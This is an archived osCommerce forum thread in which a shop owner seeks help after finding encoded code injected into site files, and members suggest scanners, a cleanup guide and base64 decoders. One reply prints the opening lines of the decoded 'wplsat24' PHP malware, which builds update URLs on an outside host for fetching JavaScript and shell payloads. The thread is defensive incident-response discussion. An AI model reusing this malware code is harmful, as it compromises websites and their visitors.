Xpajun Posted January 22, 2011 Share Posted January 22, 2011 All the files you name are not osC files - the code doesn't decode (or should I say I can't get it to decode). Check all your files to see if the same line is at the top of each (and remove). Check also all your image folders and sub folders for non-image files My store is currently running Phoenix 1.0.3.0 I'm currently working on 1.0.7.2 and hope to get it live before 1.0.8.0 arrives (maybe 🙄 ) I used to have a list of add-ons here but I've found that with the ones that supporters of Phoenix get any other add-ons are not really neccessary Link to comment Share on other sites More sharing options...
Follkes Posted January 22, 2011 Author Share Posted January 22, 2011 Hi Xpajun Notepad++ can not find that text in other files, searching manually I can not find more samples. The images folder shows only image formats, jpg, gif,... etc. The actual site has admin folder renamed and with password at server level, Security pro by FWR, Anti XSS by Spooks, plus and enhanced htaccess. Thank you for comment. Link to comment Share on other sites More sharing options...
website-security Posted January 22, 2011 Share Posted January 22, 2011 Try using this tool for finding other malicious code: http://website-security.info/tools/malicious-code-finder Link to comment Share on other sites More sharing options...
Follkes Posted January 22, 2011 Author Share Posted January 22, 2011 Thank you but I don't even know how to use it. I have installed and run Site Monitor and the report is clean. The potentially dangerous code is where it should, no exotic code found in a weird position. Maybe is dumb to think but is a bit of a relief.... Link to comment Share on other sites More sharing options...
burt Posted January 23, 2011 Share Posted January 23, 2011 If you have that code in any of your files, then you have been hacked, and it is a nasty one. The code decodes to the wplsat24 hack, here are the first few lines; $R41E9750045B5EA25161B97AC3F50EEAF = "2.0"; $GLOBALS['rewrite_old'] = 1; $GLOBALS['http'] = 'http:/'.'/'; set_time_limit(600); $GLOBALS['dg_pu'] = "{$GLOBALS['http']}wplsat24.net/?update=js&host={$_SERVER['HTTP_HOST']}"; $GLOBALS['dg_eu'] = "{$GLOBALS['http']}wplsat24.net/?update=shl&host={$_SERVER['HTTP_HOST']}"; Link to comment Share on other sites More sharing options...
Follkes Posted January 23, 2011 Author Share Posted January 23, 2011 Thank you. I don´t understand code, to me is like Chinesse. But that site does not exist anymore so maybe the hack was on ice for long. Can you tell me if are more php files called in that code? Thanks again! Link to comment Share on other sites More sharing options...
Follkes Posted January 26, 2011 Author Share Posted January 26, 2011 Burt can you tell me if there is any /InsertFile/? I googled different parts of that code but none of the files mentioned where inserted. No images/style.css.php, los.php, r0x.php, s.php, dg.php or s.php found. I tend to think that the guy did not pass to stage2. Link to comment Share on other sites More sharing options...
Follkes Posted February 1, 2011 Author Share Posted February 1, 2011 Do all of these hacks end calling to style.css.php ? because I can´t find the bugger. Link to comment Share on other sites More sharing options...
axioma Posted February 1, 2011 Share Posted February 1, 2011 read thison how to clean your site http://www.oscommerce.com/forums/topic/368746-had-3-sites-hacked-what-to-do/page__p__1553597#entry1553597 Link to comment Share on other sites More sharing options...
Follkes Posted February 2, 2011 Author Share Posted February 2, 2011 Checked, nothing new though. I can not trust any of my backups so I am doing a second pass in the code, file by file with winmerge. Can anyone decode that junk to see the pointed php files involved? Link to comment Share on other sites More sharing options...
pdcelec Posted February 2, 2011 Share Posted February 2, 2011 Checked, nothing new though. I can not trust any of my backups so I am doing a second pass in the code, file by file with winmerge. Can anyone decode that junk to see the pointed php files involved? a base 64 decoder http://www.opinionatedgeek.com/dotnet/tools/base64decode/ Link to comment Share on other sites More sharing options...
Follkes Posted February 3, 2011 Author Share Posted February 3, 2011 Yes, i know it. I tried other code samples and works fine but with mi piece of code I get just gibberish. Do you get it working with this code in particular? Thanks Link to comment Share on other sites More sharing options...
Follkes Posted February 5, 2011 Author Share Posted February 5, 2011 Right I got it decode here http://www.oscommerce.com/forums/topic/370649-base-64-decoder/ I think it was a bot unable to contact for update and the hack simply went to sleep. Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.